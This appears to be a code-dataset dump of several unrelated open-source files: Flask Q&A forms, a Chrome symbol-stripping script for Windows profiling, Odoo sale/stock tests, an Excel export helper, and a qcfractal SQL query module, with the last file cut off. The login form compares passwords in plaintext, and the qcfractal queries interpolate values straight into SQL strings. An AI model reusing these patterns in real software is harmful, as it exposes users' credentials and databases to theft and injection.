repo_name
stringlengths 5
92
| path
stringlengths 4
232
| copies
stringclasses 19
values | size
stringlengths 4
7
| content
stringlengths 721
1.04M
| license
stringclasses 15
values | hash
int64 -9,223,277,421,539,062,000
9,223,102,107B
| line_mean
float64 6.51
99.9
| line_max
int64 15
997
| alpha_frac
float64 0.25
0.97
| autogenerated
bool 1
class |
---|---|---|---|---|---|---|---|---|---|---|
Murano/microqa | app/forms.py | 1 | 1790 | # -*- coding: utf-8 -*-
from flask import flash
from flask_wtf import Form
from wtforms import StringField, TextAreaField, PasswordField, TextField
from model import User
from wtforms.validators import DataRequired, ValidationError
class QuestionForm(Form):
title = StringField(u"Заголовок вопроса", validators=[DataRequired()])
body = TextAreaField(u"Тело вопроса", validators=[DataRequired()])
tags = StringField(u"Тэги (через запятую)", validators=[DataRequired()])
class CommentForm(Form):
body = TextAreaField(u"Ответ", validators=[DataRequired()])
class LoginForm(Form):
username = StringField(u"Логин", validators=[DataRequired()])
password = PasswordField(u"Пароль", validators=[DataRequired()])
def validate_username(self, field):
user = self.get_user()
if user is None:
raise ValidationError(u'Неверное имя пользователя')
if user.password != self.password.data:
raise ValidationError(u'Неверный пароль')
def get_user(self):
return User.objects(username=self.username.data).first()
class RegistrationForm(Form):
username = TextField(u"Логин", validators=[DataRequired()])
email = TextField(u"E-mail", validators=[DataRequired()] ) # TODO: validate
password = PasswordField(u"Пароль", validators=[DataRequired()])
def validate_username(self, field):
if User.objects(username=self.username.data):
raise ValidationError(u'Такой логин уже занят')
def validate_email(self, field):
if User.objects(email=self.email.data):
raise ValidationError(u'Такой email адрес уже существует') | mit | 4,633,618,319,600,694,000 | 36.340909 | 79 | 0.704019 | false |
OSVR/UIforETWbins | bin/StripChromeSymbols.py | 1 | 13713 | # Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
This script exists to work around severe performance problems when WPA or other
Windows Performance Toolkit programs try to load the symbols for the Chrome
web browser. Some combination of the enormous size of the symbols or the
enhanced debug information generated by /Zo causes WPA to take about twenty
minutes to process the symbols for chrome.dll and chrome_child.dll. When
profiling Chrome this delay happens with every new set of symbols, so with
every new version of Chrome.
This script uses xperf actions to dump a list of the symbols referenced in
an ETW trace. If chrome.dll, chrome_child.dll, content.dll, or blink_web.dll are
detected and if decoded symbols are not found in %_NT_SYMCACHE_PATH% (default is
c:\symcache) then RetrieveSymbols.exe is used to download the symbols from the
Chromium symbol server, pdbcopy.exe is used to strip the private symbols, and
then another xperf action is used to load the stripped symbols, thus converting
them to .symcache files that can be efficiently loaded by WPA.
Locally built Chrome symbols are also supported.
More details on the discovery of this slowness and the evolution of the fix
can be found here:
https://randomascii.wordpress.com/2014/11/04/slow-symbol-loading-in-microsofts-profiler-take-two/
Discussion can be found here:
https://randomascii.wordpress.com/2013/03/09/symbols-the-microsoft-way/
Source code for RetrieveSymbols.exe can be found here:
https://github.com/google/UIforETW/tree/master/RetrieveSymbols
If "chromium-browser-symsrv" is not found in _NT_SYMBOL_PATH or RetrieveSymbols.exe
and pdbcopy.exe are not found then this script will exit early.
With the 10.0.14393 version of WPA the symbol translation problems have largely
been eliminated, which seems like it would make this script unnecessary, but the
symbol translation slowdowns have been replaced by a bug in downloading symbols from
Chrome's symbol server.
"""
from __future__ import print_function
import os
import sys
import re
import tempfile
import shutil
import subprocess
# Set to true to do symbol translation as well as downloading. Set to
# false to just download symbols and let WPA translate them.
strip_and_translate = True
def main():
if len(sys.argv) < 2:
print("Usage: %s trace.etl" % sys.argv[0])
sys.exit(0)
# Our usage of subprocess seems to require Python 2.7+
if sys.version_info.major == 2 and sys.version_info.minor < 7:
print("Your python version is too old - 2.7 or higher required.")
print("Python version is %s" % sys.version)
sys.exit(0)
symbol_path = os.environ.get("_NT_SYMBOL_PATH", "")
if symbol_path.count("chromium-browser-symsrv") == 0:
print("Chromium symbol server is not in _NT_SYMBOL_PATH. No symbol stripping needed.")
sys.exit(0)
script_dir = os.path.split(sys.argv[0])[0]
retrieve_path = os.path.join(script_dir, "RetrieveSymbols.exe")
pdbcopy_path = os.path.join(script_dir, "pdbcopy.exe")
if os.environ.has_key("programfiles(x86)"):
# The UIforETW copy of pdbcopy.exe fails to copy some Chrome PDBs that the
# Windows 10 SDK version can copy - use it if present.
pdbcopy_install = os.path.join(os.environ["programfiles(x86)"], r"Windows kits\10\debuggers\x86\pdbcopy.exe")
if os.path.exists(pdbcopy_install):
pdbcopy_path = pdbcopy_install
# This tool converts PDBs created with /debug:fastlink (VC++ 2015 feature) to
# regular PDBs that contain all of the symbol information directly. This is
# required so that pdbcopy can copy the symbols.
un_fastlink_tool = r"C:\Program Files (x86)\Microsoft Visual Studio 14.0\VC\bin\amd64\mspdbcmf.exe"
if not os.path.exists(un_fastlink_tool):
un_fastlink_tool = None
# RetrieveSymbols.exe requires some support files. dbghelp.dll and symsrv.dll
# have to be in the same directory as RetrieveSymbols.exe and pdbcopy.exe must
# be in the path, so copy them all to the script directory.
for third_party in ["pdbcopy.exe", "dbghelp.dll", "symsrv.dll"]:
if not os.path.exists(third_party):
source = os.path.normpath(os.path.join(script_dir, r"..\third_party", \
third_party))
dest = os.path.normpath(os.path.join(script_dir, third_party))
shutil.copy2(source, dest)
if not os.path.exists(pdbcopy_path):
print("pdbcopy.exe not found. No symbol stripping is possible.")
sys.exit(0)
if not os.path.exists(retrieve_path):
print("RetrieveSymbols.exe not found. No symbol retrieval is possible.")
sys.exit(0)
tracename = sys.argv[1]
# Each symbol file that we pdbcopy gets copied to a separate directory so
# that we can support decoding symbols for multiple chrome versions without
# filename collisions.
tempdirs = []
# Typical output looks like:
# "[RSDS] PdbSig: {0e7712be-af06-4421-884b-496f833c8ec1}; Age: 33; Pdb: D:\src\chromium2\src\out\Release\initial\chrome.dll.pdb"
# Note that this output implies a .symcache filename like this:
# chrome.dll-0e7712beaf064421884b496f833c8ec121v2.symcache
# In particular, note that the xperf action prints the age in decimal, but the
# symcache names use the age in hexadecimal!
pdb_re = re.compile(r'"\[RSDS\] PdbSig: {(.*-.*-.*-.*-.*)}; Age: (.*); Pdb: (.*)"')
pdb_cached_re = re.compile(r"Found .*file - placed it in (.*)")
print("Pre-translating chrome symbols from stripped PDBs to avoid 10-15 minute translation times "
"and to work around WPA symbol download bugs.")
symcache_files = []
# Keep track of the local symbol files so that we can temporarily rename them
# to stop xperf from using -- rename them from .pdb to .pdbx
local_symbol_files = []
#-tle = tolerate lost events
#-tti = tolerate time ivnersions
#-a symcache = show image and symbol identification (see xperf -help processing)
#-dbgid = show symbol identification information (see xperf -help symcache)
command = 'xperf -i "%s" -tle -tti -a symcache -dbgid' % tracename
print("> %s" % command)
found_uncached = False
raw_command_output = subprocess.check_output(command, stderr=subprocess.STDOUT)
command_output = str(raw_command_output).splitlines()
for line in command_output:
dllMatch = None # This is the name to use when generating the .symcache files
if line.count("chrome_child.dll") > 0:
# The symcache files for chrome_child.dll use the name chrome.dll for some reason
dllMatch = "chrome.dll"
# Complete list of Chrome executables and binaries. Some are only used in internal builds.
# Note that case matters for downloading PDBs.
for dllName in ["chrome.exe", "chrome.dll", "blink_web.dll", "content.dll", "chrome_elf.dll", "chrome_watcher.dll", "libEGL.dll", "libGLESv2.dll"]:
if line.count("\\" + dllName) > 0:
dllMatch = dllName
if dllMatch:
match = pdb_re.match(line)
if match:
guid, age, path = match.groups()
guid = guid.replace("-", "")
age = int(age) # Prepare for printing as hex
filepart = os.path.split(path)[1]
symcache_file = r"c:\symcache\%s-%s%xv2.symcache" % (dllMatch, guid, age)
if os.path.exists(symcache_file):
#print("Symcache file %s already exists. Skipping." % symcache_file)
continue
# Only print messages for chrome PDBs that aren't in the symcache
found_uncached = True
print("Found uncached reference to %s: %s - %s" % (filepart, guid, age, ))
symcache_files.append(symcache_file)
pdb_cache_path = None
retrieve_command = "%s %s %s %s" % (retrieve_path, guid, age, filepart)
print(" > %s" % retrieve_command)
for subline in os.popen(retrieve_command):
cache_match = pdb_cached_re.match(subline.strip())
if cache_match:
pdb_cache_path = cache_match.groups()[0]
# RetrieveSymbols puts a period at the end of the output, so strip that.
if pdb_cache_path.endswith("."):
pdb_cache_path = pdb_cache_path[:-1]
if strip_and_translate and not pdb_cache_path:
# Look for locally built symbols
if os.path.exists(path):
pdb_cache_path = path
local_symbol_files.append(path)
if pdb_cache_path:
if strip_and_translate:
tempdir = tempfile.mkdtemp()
tempdirs.append(tempdir)
dest_path = os.path.join(tempdir, os.path.basename(pdb_cache_path))
print(" Copying PDB to %s" % dest_path)
# For some reason putting quotes around the command to be run causes
# it to fail. So don't do that.
copy_command = '%s "%s" "%s" -p' % (pdbcopy_path, pdb_cache_path, dest_path)
print(" > %s" % copy_command)
if un_fastlink_tool:
# If the un_fastlink_tool is available then run the pdbcopy command in a
# try block. If pdbcopy fails then run the un_fastlink_tool and try again.
try:
output = str(subprocess.check_output(copy_command, stderr=subprocess.STDOUT))
if output:
print(" %s" % output, end="")
except:
convert_command = '%s "%s"' % (un_fastlink_tool, pdb_cache_path)
print("Attempting to un-fastlink PDB so that pdbcopy can strip it. This may be slow.")
print(" > %s" % convert_command)
subprocess.check_output(convert_command)
output = str(subprocess.check_output(copy_command, stderr=subprocess.STDOUT))
if output:
print(" %s" % output, end="")
else:
output = str(subprocess.check_output(copy_command, stderr=subprocess.STDOUT))
if output:
print(" %s" % output, end="")
if not os.path.exists(dest_path):
print("Aborting symbol generation because stripped PDB '%s' does not exist. WPA symbol loading may be slow." % dest_path)
sys.exit(0)
else:
print(" Symbols retrieved.")
else:
print(" Failed to retrieve symbols.")
if tempdirs:
symbol_path = ";".join(tempdirs)
print("Stripped PDBs are in %s. Converting to symcache files now." % symbol_path)
os.environ["_NT_SYMBOL_PATH"] = symbol_path
# Create a list of to/from renamed tuples
renames = []
error = False
try:
rename_errors = False
for local_pdb in local_symbol_files:
temp_name = local_pdb + "x"
print("Renaming %s to %s to stop unstripped PDBs from being used." % (local_pdb, temp_name))
try:
# If the destination file exists we have to rename it or else the
# rename will fail.
if os.path.exists(temp_name):
os.remove(temp_name)
os.rename(local_pdb, temp_name)
except:
# Rename can and does throw exceptions. We must catch and continue.
e = sys.exc_info()[0]
print("Hit exception while renaming %s to %s. Continuing.\n%s" % (local_pdb, temp_name, e))
rename_errors = True
else:
renames.append((local_pdb, temp_name))
#-build = build the symcache store for this trace (see xperf -help symcache)
if rename_errors:
print("Skipping symbol generation due to PDB rename errors. WPA symbol loading may be slow.")
else:
gen_command = 'xperf -i "%s" -symbols -tle -tti -a symcache -build' % tracename
print("> %s" % gen_command)
for line in os.popen(gen_command).readlines():
pass # Don't print line
except KeyboardInterrupt:
# Catch Ctrl+C exception so that PDBs will get renamed back.
if renames:
print("Ctrl+C detected. Renaming PDBs back.")
error = True
for rename_names in renames:
try:
os.rename(rename_names[1], rename_names[0])
except:
# Rename can and does throw exceptions. We must catch and continue.
e = sys.exc_info()[0]
print("Hit exception while renaming %s back. Continuing.\n%s" % (rename_names[1], e))
for symcache_file in symcache_files:
if os.path.exists(symcache_file):
print("%s generated." % symcache_file)
else:
print("Error: %s not generated." % symcache_file)
error = True
# Delete the stripped PDB files
if error:
print("Retaining PDBs to allow rerunning xperf command-line.")
print("If re-running the command be sure to go:")
print("set _NT_SYMBOL_PATH=%s" % symbol_path)
else:
for directory in tempdirs:
shutil.rmtree(directory, ignore_errors=True)
elif strip_and_translate:
if found_uncached:
print("No PDBs copied, nothing to do.")
else:
print("No uncached PDBS found, nothing to do.")
if __name__ == "__main__":
main()
| apache-2.0 | 8,157,729,412,689,827,000 | 44.795222 | 151 | 0.651448 | false |
ChawalitK/odoo | addons/sale_stock/tests/test_sale_stock.py | 1 | 14079 | # -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
from openerp.addons.sale.tests.test_sale_common import TestSale
class TestSaleStock(TestSale):
def test_00_sale_stock_invoice(self):
"""
Test SO's changes when playing around with stock moves, quants, pack operations, pickings
and whatever other model there is in stock with "invoice on delivery" products
"""
inv_obj = self.env['account.invoice']
self.so = self.env['sale.order'].create({
'partner_id': self.partner.id,
'partner_invoice_id': self.partner.id,
'partner_shipping_id': self.partner.id,
'order_line': [(0, 0, {'name': p.name, 'product_id': p.id, 'product_uom_qty': 2, 'product_uom': p.uom_id.id, 'price_unit': p.list_price}) for (_, p) in self.products.iteritems()],
'pricelist_id': self.env.ref('product.list0').id,
'picking_policy': 'direct',
})
# confirm our standard so, check the picking
self.so.action_confirm()
self.assertTrue(self.so.picking_ids, 'Sale Stock: no picking created for "invoice on delivery" stockable products')
# invoice on order
self.so.action_invoice_create()
# deliver partially, check the so's invoice_status and delivered quantities
self.assertEqual(self.so.invoice_status, 'no', 'Sale Stock: so invoice_status should be "nothing to invoice" after invoicing')
pick = self.so.picking_ids
pick.force_assign()
pick.pack_operation_product_ids.write({'qty_done': 1})
wiz_act = pick.do_new_transfer()
wiz = self.env[wiz_act['res_model']].browse(wiz_act['res_id'])
wiz.process()
self.assertEqual(self.so.invoice_status, 'to invoice', 'Sale Stock: so invoice_status should be "to invoice" after partial delivery')
del_qties = [sol.qty_delivered for sol in self.so.order_line]
del_qties_truth = [1.0 if sol.product_id.type in ['product', 'consu'] else 0.0 for sol in self.so.order_line]
self.assertEqual(del_qties, del_qties_truth, 'Sale Stock: delivered quantities are wrong after partial delivery')
# invoice on delivery: only stockable products
inv_id = self.so.action_invoice_create()
inv_1 = inv_obj.browse(inv_id)
self.assertTrue(all([il.product_id.invoice_policy == 'delivery' for il in inv_1.invoice_line_ids]),
'Sale Stock: invoice should only contain "invoice on delivery" products')
# complete the delivery and check invoice_status again
self.assertEqual(self.so.invoice_status, 'no',
'Sale Stock: so invoice_status should be "nothing to invoice" after partial delivery and invoicing')
self.assertEqual(len(self.so.picking_ids), 2, 'Sale Stock: number of pickings should be 2')
pick_2 = self.so.picking_ids[0]
pick_2.force_assign()
pick_2.pack_operation_product_ids.write({'qty_done': 1})
self.assertIsNone(pick_2.do_new_transfer(), 'Sale Stock: second picking should be final without need for a backorder')
self.assertEqual(self.so.invoice_status, 'to invoice', 'Sale Stock: so invoice_status should be "to invoice" after complete delivery')
del_qties = [sol.qty_delivered for sol in self.so.order_line]
del_qties_truth = [2.0 if sol.product_id.type in ['product', 'consu'] else 0.0 for sol in self.so.order_line]
self.assertEqual(del_qties, del_qties_truth, 'Sale Stock: delivered quantities are wrong after complete delivery')
# Without timesheet, we manually set the delivered qty for the product serv_del
self.so.order_line[1]['qty_delivered'] = 2.0
inv_id = self.so.action_invoice_create()
self.assertEqual(self.so.invoice_status, 'invoiced',
'Sale Stock: so invoice_status should be "fully invoiced" after complete delivery and invoicing')
def test_01_sale_stock_order(self):
"""
Test SO's changes when playing around with stock moves, quants, pack operations, pickings
and whatever other model there is in stock with "invoice on order" products
"""
# let's cheat and put all our products to "invoice on order"
self.so = self.env['sale.order'].create({
'partner_id': self.partner.id,
'partner_invoice_id': self.partner.id,
'partner_shipping_id': self.partner.id,
'order_line': [(0, 0, {'name': p.name, 'product_id': p.id, 'product_uom_qty': 2, 'product_uom': p.uom_id.id, 'price_unit': p.list_price}) for (_, p) in self.products.iteritems()],
'pricelist_id': self.env.ref('product.list0').id,
'picking_policy': 'direct',
})
for sol in self.so.order_line:
sol.product_id.invoice_policy = 'order'
# confirm our standard so, check the picking
self.so.action_confirm()
self.assertTrue(self.so.picking_ids, 'Sale Stock: no picking created for "invoice on order" stockable products')
# let's do an invoice for a deposit of 5%
adv_wiz = self.env['sale.advance.payment.inv'].with_context(active_ids=[self.so.id]).create({
'advance_payment_method': 'percentage',
'amount': 5.0,
'product_id': self.env.ref('sale.advance_product_0').id,
})
act = adv_wiz.with_context(open_invoices=True).create_invoices()
inv = self.env['account.invoice'].browse(act['res_id'])
self.assertEqual(inv.amount_untaxed, self.so.amount_untaxed * 5.0 / 100.0, 'Sale Stock: deposit invoice is wrong')
self.assertEqual(self.so.invoice_status, 'to invoice', 'Sale Stock: so should be to invoice after invoicing deposit')
# invoice on order: everything should be invoiced
self.so.action_invoice_create(final=True)
self.assertEqual(self.so.invoice_status, 'invoiced', 'Sale Stock: so should be fully invoiced after second invoice')
# deliver, check the delivered quantities
pick = self.so.picking_ids
pick.force_assign()
pick.pack_operation_product_ids.write({'qty_done': 2})
self.assertIsNone(pick.do_new_transfer(), 'Sale Stock: complete delivery should not need a backorder')
del_qties = [sol.qty_delivered for sol in self.so.order_line]
del_qties_truth = [2.0 if sol.product_id.type in ['product', 'consu'] else 0.0 for sol in self.so.order_line]
self.assertEqual(del_qties, del_qties_truth, 'Sale Stock: delivered quantities are wrong after partial delivery')
# invoice on delivery: nothing to invoice
self.assertFalse(self.so.action_invoice_create(), 'Sale Stock: there should be nothing to invoice')
def test_02_sale_stock_return(self):
"""
Test a SO with a product invoiced on delivery. Deliver and invoice the SO, then do a return
of the picking. Check that a refund invoice is well generated.
"""
# intial so
self.partner = self.env.ref('base.res_partner_1')
self.product = self.env.ref('product.product_delivery_01')
so_vals = {
'partner_id': self.partner.id,
'partner_invoice_id': self.partner.id,
'partner_shipping_id': self.partner.id,
'order_line': [(0, 0, {
'name': self.product.name,
'product_id': self.product.id,
'product_uom_qty': 5.0,
'product_uom': self.product.uom_id.id,
'price_unit': self.product.list_price})],
'pricelist_id': self.env.ref('product.list0').id,
}
self.so = self.env['sale.order'].create(so_vals)
# confirm our standard so, check the picking
self.so.action_confirm()
self.assertTrue(self.so.picking_ids, 'Sale Stock: no picking created for "invoice on delivery" stockable products')
# invoice in on delivery, nothing should be invoiced
self.assertEqual(self.so.invoice_status, 'no', 'Sale Stock: so invoice_status should be "no" instead of "%s".' % self.so.invoice_status)
# deliver completely
pick = self.so.picking_ids
pick.force_assign()
pick.pack_operation_product_ids.write({'qty_done': 5})
pick.do_new_transfer()
# Check quantity delivered
del_qty = sum(sol.qty_delivered for sol in self.so.order_line)
self.assertEqual(del_qty, 5.0, 'Sale Stock: delivered quantity should be 5.0 instead of %s after complete delivery' % del_qty)
# Check invoice
self.assertEqual(self.so.invoice_status, 'to invoice', 'Sale Stock: so invoice_status should be "to invoice" instead of "%s" before invoicing' % self.so.invoice_status)
inv_1_id = self.so.action_invoice_create()
self.assertEqual(self.so.invoice_status, 'invoiced', 'Sale Stock: so invoice_status should be "invoiced" instead of "%s" after invoicing' % self.so.invoice_status)
self.assertEqual(len(inv_1_id), 1, 'Sale Stock: only one invoice instead of "%s" should be created' % len(inv_1_id))
self.inv_1 = self.env['account.invoice'].browse(inv_1_id)
self.assertEqual(self.inv_1.amount_untaxed, self.inv_1.amount_untaxed, 'Sale Stock: amount in SO and invoice should be the same')
self.inv_1.signal_workflow('invoice_open')
# Create return picking
StockReturnPicking = self.env['stock.return.picking']
default_data = StockReturnPicking.with_context(active_ids=pick.ids, active_id=pick.ids[0]).default_get(['move_dest_exists', 'original_location_id', 'product_return_moves', 'parent_location_id', 'location_id'])
return_wiz = StockReturnPicking.with_context(active_ids=pick.ids, active_id=pick.ids[0]).create(default_data)
return_wiz.product_return_moves.quantity = 2.0 # Return only 2
return_wiz.product_return_moves.to_refund_so = True # Refund these 2
res = return_wiz.create_returns()
return_pick = self.env['stock.picking'].browse(res['res_id'])
# Validate picking
return_pick.force_assign()
return_pick.pack_operation_product_ids.write({'qty_done': 2})
return_pick.do_new_transfer()
# Check invoice
self.assertEqual(self.so.invoice_status, 'to invoice', 'Sale Stock: so invoice_status should be "to invoice" instead of "%s" after picking return' % self.so.invoice_status)
self.assertEqual(self.so.order_line[0].qty_delivered, 3.0, 'Sale Stock: delivered quantity should be 3.0 instead of "%s" after picking return' % self.so.order_line[0].qty_delivered)
# let's do an invoice with refunds
adv_wiz = self.env['sale.advance.payment.inv'].with_context(active_ids=[self.so.id]).create({
'advance_payment_method': 'all',
})
adv_wiz.with_context(open_invoices=True).create_invoices()
self.inv_2 = self.so.invoice_ids.filtered(lambda r: r.state == 'draft')
self.assertEqual(self.inv_2.invoice_line_ids[0].quantity, 2.0, 'Sale Stock: refund quantity on the invoice should be 2.0 instead of "%s".' % self.inv_2.invoice_line_ids[0].quantity)
self.assertEqual(self.so.invoice_status, 'no', 'Sale Stock: so invoice_status should be "no" instead of "%s" after invoicing the return' % self.so.invoice_status)
def test_03_sale_stock_delivery_partial(self):
"""
Test a SO with a product invoiced on delivery. Deliver partially and invoice the SO, when
the SO is set on 'done', the SO should be fully invoiced.
"""
# intial so
self.partner = self.env.ref('base.res_partner_1')
self.product = self.env.ref('product.product_delivery_01')
so_vals = {
'partner_id': self.partner.id,
'partner_invoice_id': self.partner.id,
'partner_shipping_id': self.partner.id,
'order_line': [(0, 0, {
'name': self.product.name,
'product_id': self.product.id,
'product_uom_qty': 5.0,
'product_uom': self.product.uom_id.id,
'price_unit': self.product.list_price})],
'pricelist_id': self.env.ref('product.list0').id,
}
self.so = self.env['sale.order'].create(so_vals)
# confirm our standard so, check the picking
self.so.action_confirm()
self.assertTrue(self.so.picking_ids, 'Sale Stock: no picking created for "invoice on delivery" stockable products')
# invoice in on delivery, nothing should be invoiced
self.assertEqual(self.so.invoice_status, 'no', 'Sale Stock: so invoice_status should be "nothing to invoice"')
# deliver partially
pick = self.so.picking_ids
pick.force_assign()
pick.pack_operation_product_ids.write({'qty_done': 4})
backorder_wiz_id = pick.do_new_transfer()['res_id']
backorder_wiz = self.env['stock.backorder.confirmation'].browse([backorder_wiz_id])
backorder_wiz.process_cancel_backorder()
# Check quantity delivered
del_qty = sum(sol.qty_delivered for sol in self.so.order_line)
self.assertEqual(del_qty, 4.0, 'Sale Stock: delivered quantity should be 4.0 after partial delivery')
# Check invoice
self.assertEqual(self.so.invoice_status, 'to invoice', 'Sale Stock: so invoice_status should be "to invoice" before invoicing')
inv_1_id = self.so.action_invoice_create()
self.assertEqual(self.so.invoice_status, 'no', 'Sale Stock: so invoice_status should be "no" after invoicing')
self.assertEqual(len(inv_1_id), 1, 'Sale Stock: only one invoice should be created')
self.inv_1 = self.env['account.invoice'].browse(inv_1_id)
self.assertEqual(self.inv_1.amount_untaxed, self.inv_1.amount_untaxed, 'Sale Stock: amount in SO and invoice should be the same')
self.so.action_done()
self.assertEqual(self.so.invoice_status, 'invoiced', 'Sale Stock: so invoice_status should be "invoiced" when set to done')
| gpl-3.0 | 8,107,648,689,109,238,000 | 59.685345 | 217 | 0.645145 | false |
Loreton/MP3Catalog | Source/Project/ExcelDB/ExcelCatalog.py | 1 | 1400 | #!/usr/bin/python
# -*- coding: iso-8859-1 -*-
#
# Scope: Programma per ...........
# by Loreto Notarantonio 2013, February
# ######################################################################################
import os, sys
import ast
################################################################################
# - M A I N
# - Prevede:
# - 2 - Controllo parametri di input
# - 5 - Chiamata al programma principale del progetto
################################################################################
def ReadExcelDB(gv, xlsFile, rangeToProcess):
logger = gv.Ln.SetLogger(package=__name__)
C = gv.Ln.LnColor()
csvFileInput = xlsFile.rsplit('.', -1)[0] + '.csv'
logger.debug('XLS file name: {0}'.format(xlsFile))
logger.debug('CSV file name: {0}'.format(csvFileInput))
# - Se il csv è più vecchio dell'xls facciamo l'export
if gv.Ln.Fmtime(xlsFile) > gv.Ln.Fmtime(csvFileInput):
msg= 'range To process: {0}'.format(rangeToProcess)
logger.debug(msg); print(msg)
mydata = gv.Ln.Excel(xlsFile)
mydata.exportCSV('Catalog', outFname=csvFileInput, rangeString=rangeToProcess, colNames=4, fPRINT=True)
else:
msg = 'excel file is older than CSV file. No export will take place.'
logger.debug(msg); print(msg)
return csvFileInput
| unlicense | -2,451,188,132,575,044,000 | 32.333333 | 111 | 0.502143 | false |
psi4/mongo_qcdb | qcfractal/storage_sockets/db_queries.py | 1 | 14717 | from typing import List, Optional, Set, Union
from sqlalchemy import Integer, inspect
from sqlalchemy.sql import bindparam, text
from qcfractal.interface.models import Molecule, ResultRecord
from qcfractal.storage_sockets.models import MoleculeORM, ResultORM
QUERY_CLASSES = set()
class QueryBase:
# The name/alias used by the REST APIs to access this class
_class_name = None
_available_groupby = set()
# Mapping of the requested feature and the internal query method
_query_method_map = {}
def __init__(self, database_name, max_limit=1000):
self.database_name = database_name
self.max_limit = max_limit
def __init_subclass__(cls, **kwargs):
if cls not in QUERY_CLASSES:
QUERY_CLASSES.add(cls)
super().__init_subclass__(**kwargs)
def query(self, session, query_key, limit=0, skip=0, include=None, exclude=None, **kwargs):
if query_key not in self._query_method_map:
raise TypeError(f"Query type {query_key} is unimplemented for class {self._class_name}")
self.session = session
return getattr(self, self._query_method_map[query_key])(**kwargs)
def execute_query(self, sql_statement, with_keys=True, **kwargs):
"""Execute sql statemet, apply limit, and return results as dict if needed"""
# TODO: check count first, way to iterate
# sql_statement += f' LIMIT {self.max_limit}'
result = self.session.execute(sql_statement, kwargs)
keys = result.keys() # get keys before fetching
result = result.fetchall()
self.session.commit()
# create a list of dict with the keys and values of the results (instead of tuples)
if with_keys:
result = [dict(zip(keys, res)) for res in result]
return result
def _base_count(self, table_name: str, available_groupbys: Set[str], groupby: Optional[List[str]] = None):
if groupby:
bad_groups = set(groupby) - available_groupbys
if bad_groups:
raise AttributeError(f"The following groups are not permissible: {missing}")
global_str = ", ".join(groupby)
select_str = global_str + ", "
extra_str = f"""GROUP BY {global_str}\nORDER BY {global_str}"""
else:
select_str = ""
extra_str = ""
sql_statement = f"""
select {select_str}count(*) from {table_name}
{extra_str}
"""
ret = self.execute_query(sql_statement, with_keys=True)
if groupby:
return ret
else:
return ret[0]["count"]
@staticmethod
def _raise_missing_attribute(cls, query_key, missing_attribute, amend_msg=""):
"""Raises error for missing attribute in a message suitable for the REST user"""
raise AttributeError(f"To query {cls._class_name} for {query_key} " f"you must provide {missing_attribute}.")
# ----------------------------------------------------------------------------
class TaskQueries(QueryBase):
_class_name = "task"
_query_method_map = {"counts": "_task_counts"}
def _task_counts(self):
sql_statement = f"""
SELECT tag, priority, status, count(*)
FROM task_queue
WHERE True
group by tag, priority, status
order by tag, priority, status
"""
return self.execute_query(sql_statement, with_keys=True)
# ----------------------------------------------------------------------------
class DatabaseStatQueries(QueryBase):
_class_name = "database_stats"
_query_method_map = {
"table_count": "_table_count",
"database_size": "_database_size",
"table_information": "_table_information",
}
def _table_count(self, table_name=None):
if table_name is None:
self._raise_missing_attribute("table_name", "table name")
sql_statement = f"SELECT count(*) from {table_name}"
return self.execute_query(sql_statement, with_keys=False)[0]
def _database_size(self):
sql_statement = f"SELECT pg_database_size('{self.database_name}')"
return self.execute_query(sql_statement, with_keys=True)[0]["pg_database_size"]
def _table_information(self):
sql_statement = f"""
SELECT relname AS table_name
, c.reltuples::BIGINT AS row_estimate
, pg_total_relation_size(c.oid) AS total_bytes
, pg_indexes_size(c.oid) AS index_bytes
, pg_total_relation_size(reltoastrelid) AS toast_bytes
FROM pg_class c
LEFT JOIN pg_namespace n ON n.oid = c.relnamespace
WHERE relkind = 'r';
"""
result = self.execute_query(sql_statement, with_keys=False)
ret = []
for row in result:
if ("pg_" in row[0]) or ("sql_" in row[0]):
continue
ret.append(list(row))
ret = {"columns": ["table_name", "row_estimate", "total_bytes", "index_bytes", "toast_bytes"], "rows": ret}
return ret
class ResultQueries(QueryBase):
_class_name = "result"
_query_method_map = {"count": "_count"}
def _count(self, groupby: Optional[List[str]] = None):
available_groupbys = {"result_type", "status"}
return self._base_count("base_result", available_groupbys, groupby=groupby)
class MoleculeQueries(QueryBase):
_class_name = "molecule"
_query_method_map = {"count": "_count"}
def _count(self, groupby: Optional[List[str]] = None):
available_groupbys = set()
return self._base_count("molecule", available_groupbys, groupby=groupby)
# ----------------------------------------------------------------------------
class TorsionDriveQueries(QueryBase):
_class_name = "torsiondrive"
_query_method_map = {
"initial_molecules": "_get_initial_molecules",
"initial_molecules_ids": "_get_initial_molecules_ids",
"final_molecules": "_get_final_molecules",
"final_molecules_ids": "_get_final_molecules_ids",
"return_results": "_get_return_results",
}
def _get_initial_molecules_ids(self, torsion_id=None):
if torsion_id is None:
self._raise_missing_attribute("initial_molecules_ids", "torsion drive id")
sql_statement = f"""
select initial_molecule from optimization_procedure as opt where opt.id in
(
select opt_id from optimization_history where torsion_id = {torsion_id}
)
order by opt.id
"""
return self.execute_query(sql_statement, with_keys=False)
def _get_initial_molecules(self, torsion_id=None):
if torsion_id is None:
self._raise_missing_attribute("initial_molecules", "torsion drive id")
sql_statement = f"""
select molecule.* from molecule
join optimization_procedure as opt
on molecule.id = opt.initial_molecule
where opt.id in
(select opt_id from optimization_history where torsion_id = {torsion_id})
"""
return self.execute_query(sql_statement, with_keys=True)
def _get_final_molecules_ids(self, torsion_id=None):
if torsion_id is None:
self._raise_missing_attribute("final_molecules_ids", "torsion drive id")
sql_statement = f"""
select final_molecule from optimization_procedure as opt where opt.id in
(
select opt_id from optimization_history where torsion_id = {torsion_id}
)
order by opt.id
"""
return self.execute_query(sql_statement, with_keys=False)
def _get_final_molecules(self, torsion_id=None):
if torsion_id is None:
self._raise_missing_attribute("final_molecules", "torsion drive id")
sql_statement = f"""
select molecule.* from molecule
join optimization_procedure as opt
on molecule.id = opt.final_molecule
where opt.id in
(select opt_id from optimization_history where torsion_id = {torsion_id})
"""
return self.execute_query(sql_statement, with_keys=True)
def _get_return_results(self, torsion_id=None):
"""All return results ids of a torsion drive"""
if torsion_id is None:
self._raise_missing_attribute("return_results", "torsion drive id")
sql_statement = f"""
